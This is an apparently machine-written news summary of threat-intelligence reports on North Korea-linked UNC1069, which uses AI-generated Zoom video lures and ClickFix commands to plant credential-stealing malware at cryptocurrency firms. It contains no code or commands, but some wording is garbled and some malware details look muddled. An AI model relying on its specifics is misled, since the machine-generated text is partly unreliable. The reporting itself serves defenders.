Ethical Hacking News
North Korea-linked UNC1069 has been actively targeting Windows and macOS systems with AI-generated video lures to facilitate financial theft from cryptocurrency organizations. This attack employs a range of tactics including compromised Telegram accounts, fake Zoom meetings, and ClickFix-style infection vectors. With the deployment of multiple new malware families, UNC1069 marks a significant expansion in its capabilities as it shifts towards targeting the Web3 industry.
UNC1069, a North Korea-linked threat actor, has been identified as a major player in cryptocurrency cyber espionage. The group uses AI-generated video lures to deceive victims into downloading malware. The malware aims to steal sensitive data from cryptocurrency organizations, including system information and browser credentials. Unclassified, but believed to be used for financial gain through social engineering schemes.
North Korea-linked threat actor, UNC1069, has been identified as a major player in the world of cryptocurrency cyber espionage. According to recent reports from Google Threat Intelligence Group (GTIG), this North Korean-based group has been actively targeting Windows and macOS systems with the ultimate goal of stealing sensitive data from cryptocurrency organizations.
The group's tactics, tactics, and procedures (TTPs) have evolved over time, incorporating cutting-edge technology such as artificial intelligence (AI) and generative tools to deceive victims. One notable example is the use of AI-generated video lures, which are being used to spoof legitimate Zoom meetings. This is achieved by compromising Telegram accounts, scheduling fake Zoom meetings using Calendly, and deploying ClickFix-style infection vectors.
The attack typically begins when a victim receives an unsolicited message from a compromised Telegram account or is invited to a fake Zoom meeting link via messages on the same platform. Upon clicking on the link, victims are presented with a fake video call interface that mirrors an actual Zoom meeting. However, this illusion is short-lived as the attackers prompt them to download and run a ClickFix-style troubleshooting command.
This command leads to the delivery of an AppleScript, which in turn drops a malicious Mach-O binary onto the system. The malware is designed to gather system information and distribute additional payloads, including a Go-based downloader codenamed HYPERCALL. This component serves as the primary vector for further payload deployment.
Among these payloads are several notable examples, including WAVESHAPER, a C++ executable that gathers system information before distributing HYPERCALL; HIDDENCALL, a Golang backdoor that provides hands-on keyboard access to the compromised system; and DEEPBREATH, a Swift-based data miner that exploits macOS's Transparency, Consent, and Control (TCC) database to gain file system access.
DEEPBREATH is particularly noteworthy for its ability to steal iCloud Keychain credentials, data from Google Chrome, Brave, and Microsoft Edge, Telegram, and the Apple Notes application. Similarly, CHROMEPUSH, a C++-based browser extension deployed via masquerading as a tool for editing Google Docs offline, comes equipped with the ability to record keystrokes, observe username and password inputs, and extract browser cookies.
The deployment of multiple new malware families alongside SUGARLOADER marks a significant expansion in UNC1069's capabilities. This shift from traditional finance targeting towards Web3 industry targets such as centralized exchanges, software developers at financial institutions, high-technology companies, and individuals at venture capital funds underscores the group's ability to adapt and evolve.
According to Mandiant researchers Ross Inman and Adrian Hernandez, "The volume of tooling deployed on a single host indicates a highly determined effort to harvest credentials, browser data, and session tokens to facilitate financial theft." This statement highlights the group's relentless pursuit of financial gain through increasingly sophisticated social engineering schemes.
Furthermore, Google Threat Intelligence Group (GTIG) has documented the same campaign under the name GhostCall, which was detailed in October 2025. Kaspersky has also tracked this campaign, with their researchers noting that "Their webcam footage had been unknowingly recorded, then uploaded to attacker-controlled infrastructure, and reused to deceive other victims."
In conclusion, UNC1069's deployment of AI-generated video lures as a key component of its social engineering campaigns highlights the evolving nature of threat actors' tactics. As such, it is essential for cryptocurrency organizations and individuals to remain vigilant in protecting themselves against these sophisticated schemes.
Related Information:
https://www.ethicalhackingnews.com/articles/North-Korea-Linked-UNC1069-Uses-AI-Lures-to-Attack-Cryptocurrency-Organizations-A-Comprehensive-Analysis-ehn.shtml
https://thehackernews.com/2026/02/north-korea-linked-unc1069-uses-ai.html
https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering
https://thehackernews.com/2025/10/researchers-expose-ghostcall-and.html
https://securelist.com/bluenoroff-apt-campaigns-ghostcall-and-ghosthire/117842/
Published: Wed Feb 18 20:07:34 2026 by llama3.2 3B Q4_K_M
